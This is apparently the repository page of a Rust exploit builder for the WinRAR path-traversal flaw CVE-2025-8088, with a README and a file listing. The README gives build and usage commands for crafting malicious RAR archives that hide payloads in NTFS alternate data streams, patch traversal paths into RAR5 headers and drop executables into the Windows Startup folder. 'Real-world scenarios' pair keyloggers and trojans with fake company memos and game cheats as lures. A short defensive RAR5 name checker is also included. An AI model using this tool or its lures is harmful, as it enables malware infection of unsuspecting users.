Associated Vulnerability
Title: Path traversal vulnerability in WinRAR (CVE-2025-8088)
Description: A path traversal vulnerability affecting the Windows version of WinRAR allows attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.
Description
A high-performance, memory-safe implementation of the WinRAR CVE-2025-8088 exploit tool, rewritten in Rust for better reliability and performance.
Readme
# WinRAR Exploit Tool - Rust Edition
> **Advanced WinRAR Path Traversal Exploit Tool - Written in Rust**
A high-performance, memory-safe implementation of the WinRAR CVE-2025-8088 exploit tool, rewritten in Rust for better reliability and performance.
## Features
- **ADS Exploitation** - NTFS Alternate Data Streams for payload hiding
- **RAR5 Header Manipulation** - Direct header patching for path injection
- **Modern GUI** - Beautiful GTK-based interface with CSS styling
- **Startup Targeting** - Automatic payload placement in Windows startup
- **Custom Decoy Support** - Use your own decoy files or default
- **Universal File Support** - Supports any file type for both payload and decoy
- **Robust Error Handling** - Comprehensive error checking and diagnostics
- **System Diagnostics** - Automatic system compatibility checking
- **Memory Efficient** - Low memory footprint with smart resource management
## Requirements
- **Rust 1.70+** - Modern Rust toolchain
- **GTK Development Libraries** - For GUI support
- **WinRAR CLI** - For RAR archive creation
- **Windows 10/11** - NTFS support required
## Quick Start
### 1. Install Rust
```bash
# Install Rust using rustup
# Verify installation
rustc --version
cargo --version
```
### 2. Install GTK Development Libraries
#### Windows (MSVC)
```bash
# Using vcpkg
vcpkg install gtk:x64-windows
```
#### Or using MSYS2
```bash
pacman -S mingw-w64-x86_64-gtk4
```
### 3. Clone and Build
```bash
# Navigate to the rust project
cd winrar_exploit_rust
# Build in debug mode
cargo build
# Build optimized release
cargo build --release
# Run the application
cargo run --release
```
## Usage
1. **Select Payload** - Choose any file as payload (.exe, .bat, .jpg, .pdf, etc.)
2. **Choose Decoy** - Select any file as decoy (will create default if empty)
3. **Name Archive** - Enter output RAR filename
4. **Build** - Generate the exploit archive
## Examples
### Basic Usage
Create a simple exploit with a payload and decoy file:
```bash
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"
# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"
```
### Advanced Usage
#### Multiple Decoy Files
```bash
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"
```
#### Custom Drop Directory
```bash
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"
```
#### Different Payload Types
```bash
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"
# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"
# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"
```
### System Diagnostics
```bash
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose
# Show available tools and features
.\winrar_exploit_rust.exe tools
```
### Real-World Scenarios
#### Scenario 1: Corporate Environment
```bash
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"
```
#### Scenario 2: Gaming Community
```bash
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"
```
The tool creates RAR archives with path traversal using:
1. **ADS Creation** - Hides payload in NTFS alternate data streams
2. **RAR Building** - Creates base RAR with ADS using WinRAR CLI
3. **Header Patching** - Injects traversal path into RAR5 headers
4. **CRC Recalculation** - Ensures archive integrity
5. **Output** - Delivers malicious RAR ready for extraction
**Path Example**: `..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe`
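A defender-side counterpart to the header patching described above, added here as an example and not part of this tool: a minimal RAR5 block walker that reports stored file names carrying a `..` component, a leading path separator, or a `:` (NTFS alternate data stream or drive letter). It assumes the documented RAR5 layout (header CRC32, vint header size, type, flags, optional extra/data sizes, then the file-header fields) and deliberately skips CRC verification; `sample_archive` is a constructed fixture, not a real archive.

```rust
// Added example, not code from the tool above: walk a RAR5 block chain and report stored names
// with a ".." component, a leading separator, or ':' (NTFS ADS / drive letter). CRCs are skipped.
const RAR5_SIG: &[u8] = b"Rar!\x1A\x07\x01\x00";
// RAR5 vint: 7 payload bits per byte, high bit set means another byte follows (max 10 bytes).
fn read_vint(b: &[u8], pos: &mut usize) -> Option<u64> {
    let mut val = 0u64;
    for shift in (0..70).step_by(7) {
        let byte = *b.get(*pos)?; *pos += 1;
        val |= u64::from(byte & 0x7f) << shift;
        if byte & 0x80 == 0 { return Some(val); }
    }
    None // malformed: too many continuation bytes
}
pub fn is_traversal(name: &str) -> bool {
    let sep = &['/', '\\'][..];
    name.split(sep).any(|seg| seg == "..") || name.starts_with(sep) || name.contains(':')
}
/// Suspicious names from file (type 2) and service (type 3) headers; None if not RAR5 or malformed.
pub fn suspicious_names(a: &[u8]) -> Option<Vec<String>> {
    if !a.starts_with(RAR5_SIG) { return None; }
    let (mut pos, mut hits) = (RAR5_SIG.len(), Vec::new());
    while pos + 4 < a.len() {
        pos += 4; // header CRC32: assumption of this example, skipped rather than verified
        let hdr_size = read_vint(a, &mut pos)? as usize; // counts from header type through extra area
        let hdr_end = pos.checked_add(hdr_size)?;
        let (hdr_type, hdr_flags) = (read_vint(a, &mut pos)?, read_vint(a, &mut pos)?);
        if hdr_flags & 0x01 != 0 { read_vint(a, &mut pos)?; } // extra area size (unused here)
        let data_size = if hdr_flags & 0x02 != 0 { read_vint(a, &mut pos)? as usize } else { 0 };
        if hdr_type == 2 || hdr_type == 3 {
            let file_flags = read_vint(a, &mut pos)?;
            for _ in 0..2 { read_vint(a, &mut pos)?; } // unpacked size, attributes
            pos += 4 * ((file_flags & 0x02 != 0) as usize + (file_flags & 0x04 != 0) as usize); // mtime, data CRC32
            for _ in 0..2 { read_vint(a, &mut pos)?; } // compression info, host OS
            let name_len = read_vint(a, &mut pos)? as usize;
            let name = String::from_utf8_lossy(a.get(pos..pos.checked_add(name_len)?)?).into_owned();
            if is_traversal(&name) { hits.push(name); }
        }
        if hdr_type == 5 { break; } // end-of-archive header
        pos = hdr_end.checked_add(data_size)?; // skip the rest of the header and the packed data
    }
    Some(hits)
}
// Constructed fixture (not a real archive): zero CRC placeholders, one byte of "packed" data per entry.
pub fn sample_archive() -> Vec<u8> {
    let parts: [&[u8]; 7] = [RAR5_SIG, &[0, 0, 0, 0, 3, 1, 0, 0], // main header: size 3, type 1
        &[0, 0, 0, 0, 16, 2, 2, 1, 0, 1, 0x20, 0, 1, 7], b"doc.txt\x41", // benign entry + data byte
        &[0, 0, 0, 0, 20, 2, 2, 1, 0, 1, 0x20, 0, 1, 11], b"..\\..\\p.exe\x42", &[0, 0, 0, 0, 3, 5, 0, 0]];
    parts.concat()
}
```

Because the fixture's CRC fields are zero, WinRAR itself would reject it as corrupt; it exists only to exercise the parser.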
## Supported File Types
### Payload Files:
- ✅ Executables (.exe, .bat, .cmd)
- ✅ Scripts (.py, .js, .vbs, .ps1)
- ✅ Documents (.pdf, .docx, .xlsx)
- ✅ Images (.jpg, .png, .gif)
- ✅ Videos (.mp4, .avi)
- ✅ Audio (.mp3, .wav)
- ✅ Any file type
### Decoy Files:
- ✅ Text files (.txt, .doc, .pdf)
- ✅ Images (.jpg, .png, .gif, .bmp)
- ✅ Videos (.mp4, .avi)
- ✅ Audio (.mp3, .wav)
- ✅ Documents (.docx, .xlsx)
- ✅ Any file type
## Architecture
```
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Application entry point
│   ├── gui.rs           # GTK-based user interface
│   ├── exploit.rs       # Core exploit logic
│   ├── ads.rs           # NTFS ADS manipulation
│   ├── rar.rs           # RAR5 header manipulation
│   ├── diagnostics.rs   # System diagnostics
│   └── error.rs         # Error handling
├── Cargo.toml           # Dependencies and build config
└── README.md            # This file
```
## Troubleshooting
The tool includes automatic diagnostics that check:
- ✅ WinRAR CLI installation
- ✅ NTFS ADS support
- ✅ Startup directory permissions
- ✅ GTK library availability
- ✅ File system compatibility
### Common Issues:
1. **"GTK not found"**
```bash
# Install GTK development libraries
# Windows (vcpkg)
vcpkg install gtk:x64-windows
# Or using MSYS2
pacman -S mingw-w64-x86_64-gtk4
```
2. **"WinRAR CLI not found"**
- Install WinRAR from https://www.winrar.com
- Ensure `rar.exe` is in Program Files
3. **"Cannot write to startup directory"**
- Run the tool as Administrator
- Check folder permissions
4. **"NTFS ADS not supported"**
- Ensure you're using NTFS file system
- ADS is not supported on FAT32/exFAT
5. **Compilation Errors**
```bash
# Update Rust toolchain
rustup update
# Clean and rebuild
cargo clean
cargo build --release
```
### Code Formatting
```bash
# Format code
cargo fmt
# Lint code
cargo clippy
```
### Dependencies
Key dependencies include:
- `gtk` - Modern GUI framework
- `tokio` - Async runtime
- `windows` - Windows API bindings
- `crc32fast` - Fast CRC32 calculation
- `byteorder` - Byte order manipulation
- `anyhow` - Error handling
## Security Considerations
- **Educational Purpose**: This tool is for authorized testing and educational purposes only
- **Controlled Environment**: Use only in controlled environments with proper consent
- **Legal Compliance**: Ensure compliance with applicable laws and regulations
- **Responsible Disclosure**: Follow responsible disclosure practices
## License
This project is licensed under the MIT License - see the LICENSE file for details.
## Author
**Made by [@kanonufo](https://t.me/kanonufo) on Telegram**
---
*High-performance red team tool for CVE-2025-8088 exploitation - Rust Edition*
File Snapshot
[4.0K] /data/pocs/fdc73c58caee660f47615d434c669d24874bdbea
├── [2.9K] build.ps1
├── [ 32K] Cargo.lock
├── [ 644] Cargo.toml
├── [   4] decoy.txt
├── [ 11K] LICENSE
├── [7.2K] README.md
├── [4.0K] src
│   ├── [4.3K] ads.rs
│   ├── [4.5K] cli.rs
│   ├── [7.2K] diagnostics.rs
│   ├── [1.1K] error.rs
│   ├── [6.2K] exploit.rs
│   ├── [ 12K] gui.rs
│   ├── [2.0K] main.rs
│   └── [8.3K] rar.rs
├── [4.0K] targer
│   ├── [ 177] CACHEDIR.TAG
│   └── [4.0K] debug
└── [4.0K] target
4 directories, 15 files